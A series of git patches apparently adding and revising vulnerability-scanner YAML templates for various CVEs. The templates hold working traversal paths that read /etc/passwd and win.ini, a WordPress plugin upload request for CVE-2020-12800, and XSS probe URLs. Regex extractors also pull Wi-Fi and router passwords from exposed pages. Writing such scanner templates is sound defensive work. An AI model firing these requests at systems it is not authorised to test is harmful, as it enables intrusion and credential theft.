+ severity: high + description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12068 + - https://www.cvedetails.com/cve/CVE-2010-1353 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 29e8c790fc5f0b3f0098af165909055045bf873e Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 14 Aug 2021 13:32:59 +0700 Subject: [PATCH 1622/4083] Create CVE-2021-3017.yaml --- cves/2021/CVE-2021-3017.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2021/CVE-2021-3017.yaml diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml new file mode 100644 index 0000000000..0967f3f37a --- /dev/null +++ b/cves/2021/CVE-2021-3017.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-3017 + +info: + name: Intelbras WIN 300/WRN 342 Disclosure + author: pikpikcu + severity: high + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3017 + tags: cve,cve2021,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/index.asp" + + matchers-condition: and + matchers: + - type: word + words: + - 'def_wirelesspassword =' + - 'def_SSID =' + part: body + + - type: status + status: + - 200 From 916d421b9829abb31ecdaa6ee0f055d13aee67dd Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 13:56:56 +0530 Subject: [PATCH 1623/4083] Update CVE-2021-3017.yaml --- cves/2021/CVE-2021-3017.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 0967f3f37a..0e10db47f1 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -4,6 +4,7 @@ info: name: Intelbras WIN 300/WRN 342 Disclosure author: pikpikcu severity: high + description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3017 tags: cve,cve2021,exposure @@ -17,9 +18,15 @@ requests: - type: word words: - 'def_wirelesspassword =' - - 'def_SSID =' + - 'Roteador Wireless' part: body - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' From 09284afb0977dcfbe7da86acec223220f15dbeb6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 13:58:04 +0530 Subject: [PATCH 1624/4083] Update CVE-2021-3017.yaml --- cves/2021/CVE-2021-3017.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 0e10db47f1..3a08045027 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -5,8 +5,10 @@ info: author: pikpikcu severity: high description: The web interface on Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. - reference: https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - tags: cve,cve2021,exposure + reference: | + - https://poc.wgpsec.org/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Intelbras/Intelbras%20Wireless%20%E6%9C%AA%E6%8E%88%E6%9D%83%E4%B8%8E%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%20CVE-2021-3017.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 + tags: cve,cve2021,exposure,router requests: - method: GET From 4c811a4dc24742adc650867a2c5a2909a969819c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 14:03:43 +0530 Subject: [PATCH 1625/4083] Update CVE-2021-3017.yaml --- cves/2021/CVE-2021-3017.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-3017.yaml b/cves/2021/CVE-2021-3017.yaml index 3a08045027..0b5d2358bc 100644 --- a/cves/2021/CVE-2021-3017.yaml +++ b/cves/2021/CVE-2021-3017.yaml @@ -22,6 +22,7 @@ requests: - 'def_wirelesspassword =' - 'Roteador Wireless' part: body + condition: and - type: status status: From 6fcc70e8d464c9948021a91b1aa8f6d9728ccb93 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 14:12:19 +0530 Subject: [PATCH 1626/4083] Update CVE-2010-5278.yaml --- cves/2010/CVE-2010-5278.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2010/CVE-2010-5278.yaml b/cves/2010/CVE-2010-5278.yaml index b52d78690f..244c56776c 100644 --- a/cves/2010/CVE-2010-5278.yaml +++ b/cves/2010/CVE-2010-5278.yaml @@ -13,15 +13,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../etc/passwd%00" + - "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00" matchers-condition: and matchers: - - - type: regex - regex: - - "root:.*:0:0" - - type: status status: - 200 + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body From 6b65897dd9a0f3875c54607dda1bb802fa6081b6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 14:30:29 +0530 Subject: [PATCH 1627/4083] Update iceflow-vpn-disclosure.yaml --- exposures/files/iceflow-vpn-disclosure.yaml | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/exposures/files/iceflow-vpn-disclosure.yaml b/exposures/files/iceflow-vpn-disclosure.yaml index c4ecab5964..7d00d161bb 100644 --- a/exposures/files/iceflow-vpn-disclosure.yaml +++ b/exposures/files/iceflow-vpn-disclosure.yaml @@ -3,7 +3,7 @@ id: iceflow-vpn-disclosure info: name: ICEFlow VPN Disclosure author: pikpikcu - severity: medium + severity: info tags: exposure,files,iceflow requests: @@ -26,7 +26,15 @@ requests: - 'ICEFLOW SYSTEM' - 'ICEFLOW' part: body + condition: or - type: status status: - 200 + + - type: word + words: + - "text/plain" + - "ICEFLOW" + part: header + condition: and From 9c51bc0abb27cf36b5560a47a20df848dbebc886 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 14:35:41 +0530 Subject: [PATCH 1628/4083] Update iceflow-vpn-disclosure.yaml --- exposures/files/iceflow-vpn-disclosure.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposures/files/iceflow-vpn-disclosure.yaml b/exposures/files/iceflow-vpn-disclosure.yaml index 7d00d161bb..d3e5969904 100644 --- a/exposures/files/iceflow-vpn-disclosure.yaml +++ b/exposures/files/iceflow-vpn-disclosure.yaml @@ -3,7 +3,7 @@ id: iceflow-vpn-disclosure info: name: ICEFlow VPN Disclosure author: pikpikcu - severity: info + severity: medium tags: exposure,files,iceflow requests: @@ -20,8 +20,8 @@ requests: matchers-condition: and matchers: - - type: binary - binary: + - type: word + words: - 'ICEFLOW VPN:' - 'ICEFLOW SYSTEM' - 'ICEFLOW' From b5123f5abed89801b344ebcee3c95e7839128f46 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 14:40:52 +0530 Subject: [PATCH 1629/4083] Update CVE-2021-37573.yaml --- cves/2021/CVE-2021-37573.yaml | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 4419e9d6d0..6c9c42fe15 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -1,11 +1,11 @@ id: CVE-2021-37573 info: - name: Tiny Java Web Server Reflected XSS - reference: - - https://seclists.org/fulldisclosure/2021/Aug/13 + name: Tiny Java Web Server - Reflected XSS author: geeknik severity: medium + reference: + - https://seclists.org/fulldisclosure/2021/Aug/13 tags: cve,cve2021,xss,tjws requests: @@ -18,7 +18,13 @@ requests: - type: status status: - 404 + - type: word part: body words: - "

    404 test not found

    " + + - type: word + part: header + words: + - text/html From d13bc82a2e08c06e6e8cbe374a20476c5724f02c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 14:42:16 +0530 Subject: [PATCH 1630/4083] Update crossdomin-xml.yaml --- exposures/files/crossdomin-xml.yaml | 22 ++++++++++------------ 1 file changed, 10 insertions(+), 12 deletions(-) diff --git a/exposures/files/crossdomin-xml.yaml b/exposures/files/crossdomin-xml.yaml index 208ca143b1..8362c3ec11 100644 --- a/exposures/files/crossdomin-xml.yaml +++ b/exposures/files/crossdomin-xml.yaml @@ -1,25 +1,23 @@ id: insecure-crossdomain info: - name: Insecure cross-domain.xml file + name: Insecure cross-domain.xml file author: Borna Nematzadeh severity: info - reference: https://www.acunetix.com/vulnerabilities/web/insecure-crossdomain-xml-file + reference: https://www.acunetix.com/vulnerabilities/web/insecure-crossdomain-xml-file tags: exposure - -requests: + +requests: - method: GET - path: + path: - "{{BaseURL}}/crossdomain.xml" - - matchers-condition: and + + matchers-condition: and matchers: - - type: status + - type: status status: - 200 - type: word - part: body - words: + part: body + words: - '' - - From 77f59df9c810098abd10b9c587577079cafbfbd4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 15:45:34 +0530 Subject: [PATCH 1631/4083] Update crossdomin-xml.yaml --- exposures/files/crossdomin-xml.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/files/crossdomin-xml.yaml b/exposures/files/crossdomin-xml.yaml index 8362c3ec11..b213e1cb27 100644 --- a/exposures/files/crossdomin-xml.yaml +++ b/exposures/files/crossdomin-xml.yaml @@ -2,10 +2,10 @@ id: insecure-crossdomain info: name: Insecure cross-domain.xml file - author: Borna Nematzadeh + author: Borna Nematzadeh,nadino severity: info reference: https://www.acunetix.com/vulnerabilities/web/insecure-crossdomain-xml-file - tags: exposure + tags: exposure,generic requests: - method: GET From edffa49ca48c8e140f793926e81d7bb8332da4b2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 15:53:30 +0530 Subject: [PATCH 1632/4083] Update netis-info-leak.yaml --- vulnerabilities/other/netis-info-leak.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml index 9e3cd22bc1..e77117e421 100644 --- a/vulnerabilities/other/netis-info-leak.yaml +++ b/vulnerabilities/other/netis-info-leak.yaml @@ -26,3 +26,9 @@ requests: - "rp_ap_ssid" part: body condition: and + + extractors: + - type: regex + part: body + regex: + - "'rp_soon_password':'([A-Za-z0-9]+)'" From 7bce4fbb26918c1ec84a459680d163018006fd61 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 14 Aug 2021 16:00:00 +0530 Subject: [PATCH 1633/4083] Update netis-info-leak.yaml --- vulnerabilities/other/netis-info-leak.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/netis-info-leak.yaml b/vulnerabilities/other/netis-info-leak.yaml index e77117e421..9cfa7fac56 100644 --- a/vulnerabilities/other/netis-info-leak.yaml +++ b/vulnerabilities/other/netis-info-leak.yaml @@ -3,7 +3,7 @@ id: netis-info-leak info: name: Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak author: gy741 - severity: low + severity: medium reference: https://www.exploit-db.com/exploits/48384 tags: netis,exposure From ffcfaa5cb1ea268d5975a62d28eddd93effee4ae Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 14 Aug 2021 16:51:20 +0530 Subject: [PATCH 1634/4083] minor update --- exposures/files/iceflow-vpn-disclosure.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/files/iceflow-vpn-disclosure.yaml b/exposures/files/iceflow-vpn-disclosure.yaml index d3e5969904..ea29fbdcb4 100644 --- a/exposures/files/iceflow-vpn-disclosure.yaml +++ b/exposures/files/iceflow-vpn-disclosure.yaml @@ -4,7 +4,7 @@ info: name: ICEFlow VPN Disclosure author: pikpikcu severity: medium - tags: exposure,files,iceflow + tags: exposure,files,iceflow,logs requests: - method: GET @@ -18,6 +18,7 @@ requests: - "{{BaseURL}}/log/mobile.log" - "{{BaseURL}}/log/firewall.log" + max-size: 2048 matchers-condition: and matchers: - type: word From 45a46dad92edbda9ba16490d58aaf60a057db265 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 14 Aug 2021 18:22:17 +0700 Subject: [PATCH 1635/4083] Update CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 1c31973d6b..d4fe72d7c2 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" + - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini" matchers-condition: and matchers: From 73f37aa7c5bf3b111788d14e2f8397a548ae9ef8 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sat, 14 Aug 2021 18:37:50 +0700 Subject: [PATCH 1636/4083] Create CVE-2019-16313.yaml --- cves/2019/CVE-2019-16313.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2019/CVE-2019-16313.yaml diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml new file mode 100644 index 0000000000..5fee4615b0 --- /dev/null +++ b/cves/2019/CVE-2019-16313.yaml @@ -0,0 +1,33 @@ +id: CVE-2019-16313 + +info: + name: ifw8 Router ROM v4.31 allows credential disclosure + author: pikpikcu + severity: high + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-16313 + tags: cve,cve2019,tvt,lfi + +requests: + - method: GET + path: + - '{{BaseURL}}/action/usermanager.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'user' + - 'pwd' + part: body + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'pwd : "([A-Za-z0-9=]+)",' From 237eeffa47408f5dcb0c89119b82bbd7fb76eaba Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 14 Aug 2021 17:23:15 +0530 Subject: [PATCH 1637/4083] minor update --- exposed-panels/bazarr-login.yaml | 28 ++++------------------------ 1 file changed, 4 insertions(+), 24 deletions(-) diff --git a/exposed-panels/bazarr-login.yaml b/exposed-panels/bazarr-login.yaml index 9ef197aa06..87b5c39966 100644 --- a/exposed-panels/bazarr-login.yaml +++ b/exposed-panels/bazarr-login.yaml @@ -8,31 +8,11 @@ info: tags: panel,bazarr,login requests: - - raw: - - | - GET /system/status HTTP/1.1 - Host: {{BaseURL}} - Connection: keep-alive - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im + - method: GET + path: + - "{{BaseURL}}/login" - - | - GET /login HTTP/1.1 - Host: {{BaseURL}} - Connection: keep-alive - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Sec-GPC: 1 - Accept-Encoding: gzip, deflate - Accept-Language: en-US,en;q=0.9 - - matchers-condition: and matchers: - type: word words: - - 'Bazarr' - - 'Bazarr is a companion application to Sonarr and Radarr' + - 'Bazarr' \ No newline at end of file From 51b15ff0d45dfca54eeb9834b918f42252fd57e1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 14 Aug 2021 17:28:23 +0530 Subject: [PATCH 1638/4083] severity update --- exposures/files/iceflow-vpn-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/iceflow-vpn-disclosure.yaml b/exposures/files/iceflow-vpn-disclosure.yaml index ea29fbdcb4..28d2389e90 100644 --- a/exposures/files/iceflow-vpn-disclosure.yaml +++ b/exposures/files/iceflow-vpn-disclosure.yaml @@ -3,7 +3,7 @@ id: iceflow-vpn-disclosure info: name: ICEFlow VPN Disclosure author: pikpikcu - severity: medium + severity: low tags: exposure,files,iceflow,logs requests: From 180219cc6332066e24ed739b584d80843c227416 Mon Sep 17 00:00:00 2001 From: pajoda Date: Sat, 14 Aug 2021 16:22:35 +0000 Subject: [PATCH 1639/4083] Add CVE-2021-37704 template --- cves/2021/CVE-2021-37704.yaml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 cves/2021/CVE-2021-37704.yaml diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml new file mode 100644 index 0000000000..aaa2df18fa --- /dev/null +++ b/cves/2021/CVE-2021-37704.yaml @@ -0,0 +1,18 @@ +id: CVE-2021-37704 + +info: + name: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. + author: whoever + severity: low + tags: cve,composer,phpinfo + +requests: + - method: GET + path: + - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + condition: and From c9fa891245b99483e7ff7a79c77158866c5ff767 Mon Sep 17 00:00:00 2001 From: pajoda Date: Sat, 14 Aug 2021 16:34:59 +0000 Subject: [PATCH 1640/4083] Improve template metadata --- cves/2021/CVE-2021-37704.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index aaa2df18fa..601be1ffbe 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -1,10 +1,14 @@ id: CVE-2021-37704 info: - name: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. + name: phpinfo() exposure (CVE-2021-37704) author: whoever severity: low + description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. tags: cve,composer,phpinfo + reference: | + https://github.com/PHPSocialNetwork/phpfastcache/pull/813 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 requests: - method: GET From 5d3d6ca9118b655f79b2ffcad95719b51ce050ff Mon Sep 17 00:00:00 2001 From: pajoda Date: Sat, 14 Aug 2021 18:56:37 +0000 Subject: [PATCH 1641/4083] Maintain matcher and extractor consistency --- cves/2021/CVE-2021-37704.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index 601be1ffbe..8bb90f41d9 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -14,9 +14,22 @@ requests: - method: GET path: - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" + + matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>
    From 3399c80010d4c02bdaf44521e05d63aaedf98d6b Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 24 Aug 2021 06:04:17 +0700 Subject: [PATCH 1817/4083] Create CVE-2010-1535.yaml --- cves/2010/CVE-2010-1535.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1535.yaml diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml new file mode 100644 index 0000000000..2cc713f2ab --- /dev/null +++ b/cves/2010/CVE-2010-1535.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1535 + +info: + name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: | + - https://www.exploit-db.com/exploits/12151 + - https://www.cvedetails.com/cve/CVE-2010-1535 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From a78b4a4f8957bd0063f8ecc0751ec0677178aab9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 24 Aug 2021 06:14:16 +0700 Subject: [PATCH 1818/4083] Create CVE-2010-1475.yaml --- cves/2010/CVE-2010-1475.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1475.yaml diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml new file mode 100644 index 0000000000..44a2dd1650 --- /dev/null +++ b/cves/2010/CVE-2010-1475.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1475 + +info: + name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12147 + - https://www.cvedetails.com/cve/CVE-2010-1475 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 902f6ef3bbcea42faf5ed4119656f1b14dc76b93 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 24 Aug 2021 06:14:42 +0700 Subject: [PATCH 1819/4083] Update CVE-2010-1535.yaml --- cves/2010/CVE-2010-1535.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml index 2cc713f2ab..f4ad1e3c80 100644 --- a/cves/2010/CVE-2010-1535.yaml +++ b/cves/2010/CVE-2010-1535.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/12151 - https://www.cvedetails.com/cve/CVE-2010-1535 tags: cve,cve2010,joomla,lfi From fba446193232c4a040b74f7824f9c2db04984487 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 04:57:51 +0530 Subject: [PATCH 1820/4083] Added CVE-2020-12800 --- cves/2020/CVE-2020-12800.yaml | 60 +++++++++++++++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 cves/2020/CVE-2020-12800.yaml diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml new file mode 100644 index 0000000000..d7cd9bc76a --- /dev/null +++ b/cves/2020/CVE-2020-12800.yaml @@ -0,0 +1,60 @@ +id: CVE-2020-12800 + +info: + name: WordPress 'Drag & Drop Multiple File Upload - Contact Form 7' Plugin - Pre-auth RCE + author: dwisiswant0 + severity: critical + description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. + reference: https://github.com/amartinsec/CVE-2020-12800 + +requests: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601 + X-Requested-With: XMLHttpRequest + + -----------------------------350278735926454076983690555601 + Content-Disposition: form-data; name="supported_type" + + txt% + -----------------------------350278735926454076983690555601 + Content-Disposition: form-data; name="size_limit" + + 5242880 + -----------------------------350278735926454076983690555601 + Content-Disposition: form-data; name="action" + + dnd_codedropz_upload + -----------------------------350278735926454076983690555601 + Content-Disposition: form-data; name="type" + + click + -----------------------------350278735926454076983690555601 + Content-Disposition: form-data; name="upload-file"; filename="{{randstr}}.txt%" + Content-Type: application/x-httpd-php + + CVE-2020-12800-{{randstr}} + -----------------------------350278735926454076983690555601-- + + - | + GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "CVE-2020-12800-{{randstr}}" + + - type: word + part: header + words: + - "text/plain" + From 85f8cf2c412cc0d137ad001434332ef89f3eb39c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 24 Aug 2021 05:00:04 +0530 Subject: [PATCH 1821/4083] Update CVE-2020-12800.yaml --- cves/2020/CVE-2020-12800.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index d7cd9bc76a..4a4a96bb69 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -57,4 +57,3 @@ requests: part: header words: - "text/plain" - From 21ca2234d2cf61405f73afb1c00514c23c569eed Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Mon, 23 Aug 2021 17:27:13 -0700 Subject: [PATCH 1822/4083] Added CVE-2019-8937.yaml Template --- cves/2019/CVE-2019-8937.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2019/CVE-2019-8937.yaml diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml new file mode 100644 index 0000000000..3e7aef68bc --- /dev/null +++ b/cves/2019/CVE-2019-8937.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-8937 + +info: + name: HotelDruid 2.3.0 - XSS + author: Borna Nematzadeh + severity: medium + refrense: https://www.exploit-db.com/exploits/46429 + tags: cve,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671">' + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?nsextt=x">' + - '{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=periodi&mese_fine=13">' + - '{{BaseURL}}/hoteldruid/personalizza.php?anno=2019&id_sessione=&aggiorna_qualcosa=SI&cambianumerotariffe=1&nuovo_numero_tariffe=8&origine=./creaprezzi.php">' + - '{{BaseURL}}/hoteldruid/tabella3.php?id_sessione=&mese=01&tutti_mesi=1&anno=2019">' + - '{{BaseURL}}/hoteldruid/creaprezzi.php?anno=2019&id_sessione=&ins_rapido_costo=SI&tipocostoagg=perm_min&origine=crearegole.php">' + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + words: + - "text/html" + part: header \ No newline at end of file From ae800b1ab1c3fbfcb25b57adc211719f58555d38 Mon Sep 17 00:00:00 2001 From: LogicalHunter Date: Mon, 23 Aug 2021 18:15:08 -0700 Subject: [PATCH 1823/4083] Added CVE-2019-15501.yaml Template --- cves/2019/CVE-2019-15501.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2019/CVE-2019-15501.yaml diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml new file mode 100644 index 0000000000..b6d85a69fc --- /dev/null +++ b/cves/2019/CVE-2019-15501.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-15501 + +info: + name: LSoft ListServ - XSS + author: Borna Nematzadeh + severity: medium + refrense: https://www.exploit-db.com/exploits/47302 + tags: cve,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/scripts/wa.exe?OK=' + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + words: + - "text/html" + part: header From 11b6899c9e4200cd3853ee36602ab5b648ef5b64 Mon Sep 17 00:00:00 2001 From: pajoda Date: Tue, 24 Aug 2021 01:42:35 +0000 Subject: [PATCH 1824/4083] Create CVE-2021-37538.yaml --- 